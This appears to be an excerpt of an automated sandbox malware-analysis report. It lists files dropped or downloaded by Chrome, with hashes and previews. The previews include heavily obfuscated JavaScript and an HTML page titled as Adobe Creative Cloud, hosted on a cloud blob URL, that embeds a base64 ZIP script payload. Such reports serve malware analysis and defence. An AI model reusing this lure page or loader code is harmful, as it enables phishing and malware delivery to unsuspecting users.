          Preview:L..................F.@.. ...$+.,....W..|.P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y0.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y:.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y:.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y:............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y<............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):80367
          Entropy (8bit):5.827675065514601
          Encrypted:false
          SSDEEP:
          MD5:18AD49DF0D8B5B4610DA03380FA0CA0A
          SHA1:161019AB28A062E1080B53775450F132DA90768B
          SHA-256:2E63D996453A154C17A84C16C7E2E780C279B71EA9707CA801B932D6AC6EC30B
          SHA-512:D34710CDBB5EF3524E05D2F5F772B1BAF420602747946890CD8DC8D7F59A880DF21629DD5FFB67358BCF1B4A640378D85EF72A0AE8AFB32A0F6CEB52D17C4CDD
          Malicious:false
          Reputation:unknown
          Preview:function _sxeoWMVHyRhcTaVAwQKRaEHUppNyvseGbDpDKsIPNexmUUPKquIuKTDPrqIMtVXdmKBZonDegLPBsilsvcGytuXPfGFrcszFEplONgGFBEmJOkAabvuFAdKOApMfRKtFQRfDovRtohvtpycizJyUHRhjwLzUnnWNyVQhLEVyrHQZSkxLIuSbJbSjlekfrHnKxatImYCQvIuDfGjDRXXUeFMBNJiArrVAFYumUHwFzPNTHeYshGrvfmLkQIHiZJMJRPjZmJalCZbQEujuWHtCrzjCtggFfbTMYAoHIRJkiyGheXqfihAxsruDeiyCcQmXztTpgYziZIykzDdmpgarZAlyDGNugqDbrbnuyzpPucrRwpCOEdrqukrqmBMKMjyFEgVUyXCYRClCBPnIPrUzHeXGucTjCdNHvzfGBZAHfGPhHlYUABcKvjTaluZyqhlnODqtttsFIyLnfPjCMDTjzVIfVsZQyBfezYWRcmbiFvkrZyEjEXnp2160(_sxeoWMVHyRhcTaVAwQKRaEHUppNyvseGbDpDKsIPNexmUUPKquIuKTDPrqIMtVXdmKBZonDegLPBsilsvcGytuXPfGFrcszFEplONgGFBEmJOkAabvuFAdKOApMfRKtFQRfDovRtohvtpycizJyUHRhjwLzUnnWNyVQhLEVyrHQZSkxLIuSbJbSjlekfrHnKxatImYCQvIuDfGjDRXXUeFMBNJiArrVAFYumUHwFzPNTHeYshGrvfmLkQIHiZJMJRPjZmJalCZbQEujuWHtCrzjCtggFfbTMYAoHIRJkiyGheXqfihAxsruDeiyCcQmXztTpgYziZIykzDdmpgarZAlyDGNugqDbrbnuyzpPucrRwpCOEdrqukrqmBMKMjyFEgVUyXCYRClCBPnIPrUzHeXGucTjCdNHvzfGBZAHfGPhHlYUABcKvjTaluZyqhlnODqtttsFIyLnfPjCMDTjzVIfVsZQyBfezYWR
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):0
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:
          MD5:B7B3E6C0BB0F1F005D0EEC747BFC84EA
          SHA1:A55425B1FE1BD6D844B1E3408B6DE7CB223E9676
          SHA-256:02E2CD65CA6B3908FBD9FBBEFEBE1E34DC7CC692CE6DA5688287678B06D8B8DD
          SHA-512:214B1BE93E34DADE2C558C29B715D61729E235A51E7100CFBAA7789FBE116080BA447612169D9D94FEB6EAFEA41300DCE9BCE296A6B2BB06A4DDCAEEE57C4D6A
          Malicious:false
          Reputation:unknown
          Preview:function _YKkDnBXYcFNgPEumrtkMvVlbmaBdqjZDCvDUgJxXJycNVWuVgICIhREJHTVjcXfxNXEfQZYEcosXHUpsqVUmgPbepUmwOwOtLsUwdfGjNSbTmWaKTpNIHAsVOdfHUTncLGaBNTEJSvXpXplqcWcuXcOGGINtXvAglsHCpVkRuOGNLGoKwfGNzGWBMXKiZVsDJPcEFlprJcENWVECSOzSBKaNLbbrkWqpfWCPaIHAmOhINuMxgSKsPjIIJaCOBqyUjcagEtAVaaVqxQuWGvJchkxYApnEmGXzfZTmMCTHbPkXYaAPZydilCSjgDZCdCMBdQuneoIXfpUCyJqaUQCgTOqWNHvIHxXSKowPwKYerHUvVUXQEvmDmciajSMagmWPlJuGmvkBAXVjwKJlYtdSODfDmfqARPPdYxKxAALpNcHhzzKNKvdeQGlaTtMDDixuwBsIcoRTuEepjMvjJDhLwpziwRPcKFoFuBUZNOchkOdNVwvdJsEj1b8a(){var _YKkDnBXYcFNgPEumrtkMvVlbmaBdqjZDCvDUgJxXJycNVWuVgICIhREJHTVjcXfxNXEfQZYEcosXHUpsqVUmgPbepUmwOwOtLsUwdfGjNSbTmWaKTpNIHAsVOdfHUTncLGaBNTEJSvXpXplqcWcuXcOGGINtXvAglsHCpVkRuOGNLGoKwfGNzGWBMXKiZVsDJPcEFlprJcENWVECSOzSBKaNLbbrkWqpfWCPaIHAmOhINuMxgSKsPjIIJaCOBqyUjcagEtAVaaVqxQuWGvJchkxYApnEmGXzfZTmMCTHbPkXYaAPZydilCSjgDZCdCMBdQuneoIXfpUCyJqaUQCgTOqWNHvIHxXSKowPwKYerHUvVUXQEvmDmciajSMagmWPlJuGmvkBAXVjwKJlYtdSODfDmfqARPPdYxKxAALpNcHhzzKNKvdeQGlaTtMDDixuwBsIcoRTuEepjMvjJDhLwpziwRPcKF
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):0
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:
          MD5:18AD49DF0D8B5B4610DA03380FA0CA0A
          SHA1:161019AB28A062E1080B53775450F132DA90768B
          SHA-256:2E63D996453A154C17A84C16C7E2E780C279B71EA9707CA801B932D6AC6EC30B
          SHA-512:D34710CDBB5EF3524E05D2F5F772B1BAF420602747946890CD8DC8D7F59A880DF21629DD5FFB67358BCF1B4A640378D85EF72A0AE8AFB32A0F6CEB52D17C4CDD
          Malicious:false
          Reputation:unknown
          Preview:function _sxeoWMVHyRhcTaVAwQKRaEHUppNyvseGbDpDKsIPNexmUUPKquIuKTDPrqIMtVXdmKBZonDegLPBsilsvcGytuXPfGFrcszFEplONgGFBEmJOkAabvuFAdKOApMfRKtFQRfDovRtohvtpycizJyUHRhjwLzUnnWNyVQhLEVyrHQZSkxLIuSbJbSjlekfrHnKxatImYCQvIuDfGjDRXXUeFMBNJiArrVAFYumUHwFzPNTHeYshGrvfmLkQIHiZJMJRPjZmJalCZbQEujuWHtCrzjCtggFfbTMYAoHIRJkiyGheXqfihAxsruDeiyCcQmXztTpgYziZIykzDdmpgarZAlyDGNugqDbrbnuyzpPucrRwpCOEdrqukrqmBMKMjyFEgVUyXCYRClCBPnIPrUzHeXGucTjCdNHvzfGBZAHfGPhHlYUABcKvjTaluZyqhlnODqtttsFIyLnfPjCMDTjzVIfVsZQyBfezYWRcmbiFvkrZyEjEXnp2160(_sxeoWMVHyRhcTaVAwQKRaEHUppNyvseGbDpDKsIPNexmUUPKquIuKTDPrqIMtVXdmKBZonDegLPBsilsvcGytuXPfGFrcszFEplONgGFBEmJOkAabvuFAdKOApMfRKtFQRfDovRtohvtpycizJyUHRhjwLzUnnWNyVQhLEVyrHQZSkxLIuSbJbSjlekfrHnKxatImYCQvIuDfGjDRXXUeFMBNJiArrVAFYumUHwFzPNTHeYshGrvfmLkQIHiZJMJRPjZmJalCZbQEujuWHtCrzjCtggFfbTMYAoHIRJkiyGheXqfihAxsruDeiyCcQmXztTpgYziZIykzDdmpgarZAlyDGNugqDbrbnuyzpPucrRwpCOEdrqukrqmBMKMjyFEgVUyXCYRClCBPnIPrUzHeXGucTjCdNHvzfGBZAHfGPhHlYUABcKvjTaluZyqhlnODqtttsFIyLnfPjCMDTjzVIfVsZQyBfezYWR
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):80368
          Entropy (8bit):5.8114661695651835
          Encrypted:false
          SSDEEP:
          MD5:B7B3E6C0BB0F1F005D0EEC747BFC84EA
          SHA1:A55425B1FE1BD6D844B1E3408B6DE7CB223E9676
          SHA-256:02E2CD65CA6B3908FBD9FBBEFEBE1E34DC7CC692CE6DA5688287678B06D8B8DD
          SHA-512:214B1BE93E34DADE2C558C29B715D61729E235A51E7100CFBAA7789FBE116080BA447612169D9D94FEB6EAFEA41300DCE9BCE296A6B2BB06A4DDCAEEE57C4D6A
          Malicious:false
          Reputation:unknown
          Preview:function _YKkDnBXYcFNgPEumrtkMvVlbmaBdqjZDCvDUgJxXJycNVWuVgICIhREJHTVjcXfxNXEfQZYEcosXHUpsqVUmgPbepUmwOwOtLsUwdfGjNSbTmWaKTpNIHAsVOdfHUTncLGaBNTEJSvXpXplqcWcuXcOGGINtXvAglsHCpVkRuOGNLGoKwfGNzGWBMXKiZVsDJPcEFlprJcENWVECSOzSBKaNLbbrkWqpfWCPaIHAmOhINuMxgSKsPjIIJaCOBqyUjcagEtAVaaVqxQuWGvJchkxYApnEmGXzfZTmMCTHbPkXYaAPZydilCSjgDZCdCMBdQuneoIXfpUCyJqaUQCgTOqWNHvIHxXSKowPwKYerHUvVUXQEvmDmciajSMagmWPlJuGmvkBAXVjwKJlYtdSODfDmfqARPPdYxKxAALpNcHhzzKNKvdeQGlaTtMDDixuwBsIcoRTuEepjMvjJDhLwpziwRPcKFoFuBUZNOchkOdNVwvdJsEj1b8a(){var _YKkDnBXYcFNgPEumrtkMvVlbmaBdqjZDCvDUgJxXJycNVWuVgICIhREJHTVjcXfxNXEfQZYEcosXHUpsqVUmgPbepUmwOwOtLsUwdfGjNSbTmWaKTpNIHAsVOdfHUTncLGaBNTEJSvXpXplqcWcuXcOGGINtXvAglsHCpVkRuOGNLGoKwfGNzGWBMXKiZVsDJPcEFlprJcENWVECSOzSBKaNLbbrkWqpfWCPaIHAmOhINuMxgSKsPjIIJaCOBqyUjcagEtAVaaVqxQuWGvJchkxYApnEmGXzfZTmMCTHbPkXYaAPZydilCSjgDZCdCMBdQuneoIXfpUCyJqaUQCgTOqWNHvIHxXSKowPwKYerHUvVUXQEvmDmciajSMagmWPlJuGmvkBAXVjwKJlYtdSODfDmfqARPPdYxKxAALpNcHhzzKNKvdeQGlaTtMDDixuwBsIcoRTuEepjMvjJDhLwpziwRPcKF
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (63404)
          Category:dropped
          Size (bytes):1534944
          Entropy (8bit):5.663245327142174
          Encrypted:false
          SSDEEP:
          MD5:75412BD2D12A555F74D4691277E1CD4A
          SHA1:64A777235308A4733B072A917B82DB04A322C9B1
          SHA-256:2F7B2D2032C370EF269FCD84BDB8FBBD1B9005BDAC62107F22250594E42ED654
          SHA-512:3786745F4D654E028D2EAC8B15C074C31EA8F56041426119312534362E087EF8C9D6A3EC1CD951E4D86BA5AC0586A68ED321CDBCFEA3A9FDF5E3AD3A66572521
          Malicious:false
          Reputation:unknown
          Preview:/*! For license information please see index.browser.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfuscator=t():e.JavaScriptObfuscator=t()}(self,(()=>(()=>{var e={3913:(e,t,r)=>{!function(){"use strict";var e,n,i,a,o,s,c,u,l,d,p,f,m,h,g,y,b,S,v,C,A,_,E,N,I,T;function D(e){return Y.Statement.hasOwnProperty(e.type)}o=r(2993),s=r(649),e=o.Syntax,i={"??":(n={Sequence:0,Yield:1,Assignment:1,Conditional:2,ArrowFunction:2,NullishCoalescing:3,LogicalOR:3,LogicalAND:4,BitwiseOR:5,BitwiseXOR:6,BitwiseAND:7,Equality:8,Relational:9,BitwiseSHIFT:10,Additive:11,Multiplicative:12,Exponentiation:13,Await:14,Unary:14,Postfix:15,OptionalChaining:16,Call:17,New:18,TaggedTemplate:19,Member:20,Primary:21}).NullishCoalescing,"||":n.LogicalOR,"&&":n.LogicalAND,"|":n.BitwiseOR,"^":n.BitwiseXOR,"&":n.BitwiseAND,"==":n.Equality,"!=":n.Equality,"===":n.Equality,"
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:data
          Category:dropped
          Size (bytes):97630
          Entropy (8bit):5.429354252249744
          Encrypted:false
          SSDEEP:
          MD5:B5D02B3F0BF3AE026451909419DF07BB
          SHA1:C96375D50E72B199AA54DE7B9AD908FD5A2DC7BC
          SHA-256:ACC7E41455A80765B5FD9C7EE1B8078A6D160BBBCA455AEAE854DE65C947D59E
          SHA-512:5CC55DDBC175A07FCEEF57F3C019D5EC7B9C2F1570B717F6E9757C3F8C0F936E840F1B8667DD4DF1BB0EB6D9A7A267020F7092E593112F9D07D0680E1EF7A0B6
          Malicious:false
          Reputation:unknown
          Preview:/*!..JSZip v3.10.1 - A JavaScript class for generating and reading zip files.<http://stuartk.com/jszip>..(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>.Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/main/LICENSE.markdown...JSZip uses the library pako released under the MIT license :.https://github.com/nodeca/pako/blob/main/LICENSE.*/..!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function(){return function s(a,o,h){function u(r,e){if(!o[r]){if(!a[r]){var t="function"==typeof require&&require;if(!e&&t)return t(r,!0);if(l)return l(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var i=o[r]={exports:{}};a[r][0].call(i.exports,function(e){var t=a[r][1][e];return u(t||e)},i,i.exports,s,a,o
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text, with very long lines (7998), with CRLF line terminators
          Category:downloaded
          Size (bytes):13222
          Entropy (8bit):6.149387456295065
          Encrypted:false
          SSDEEP:
          MD5:1C040804C9C0FE0EA9088256E8EB68C7
          SHA1:49DBCA826CC1559AA190B4F94B535669A621593B
          SHA-256:0239A0A2D8A78BCCA155DB11C6A6A5A95DDDBC199B0A40985E6380C939F8330F
          SHA-512:6CFF3D4B94517C6DB3B2C839BEECF27BE3AF23DE1B8145971B7FE99E952E08F88DD3D748B398C45A2D2DEFA2720CEA62058CA430E738E2B6C3253375935218DB
          Malicious:false
          Reputation:unknown
          URL:https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Adobe Creative Cloud | Creative Apps & Services.</title>...<link rel="icon" href="https://www.adobe.com/content/dam/cc/Adobe_favicon.ico" type="image/x-icon"> For .ico file -->.. <script src="https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js"></script>..</head>..<body>.... <script>.. const base64ZIP = 'UEsDBBQACAAIAEqnkVkAAAAAAAAAAAAAAAASACAAb2JmMTEtMzAgLSBtYWluLmpzdXgLAAEEAAAAAAQAAAAAVVQNAAfc12FnD9hhZ/DXYWeteWlz48aW5feJmP+g6Wh3VQ3tInaSrtGHxEoQBEAsBAnYFR3Y9x0EQDr83ycllVRU2f3i9SIFJfDmdvMi7znnAh+jS+UPaV19/PTH6HYP/47MKIcgxOPHlytAffr4Lw2yCptT8kfxOTZ/SqoQC/zOePjJf+h+/1A04S89WqcP0e8fPocPyq/14A6fhvpj8ZB+7shw2XgPv3xO1PpPOODnYRquRlFc+sGYP2fh8pdffioefg2XYWMM5RUtun8LYpl9/POLjrr/mkYPYXrxm+4r73e/hr9VRfxg+E2d/vpwS
          No static file info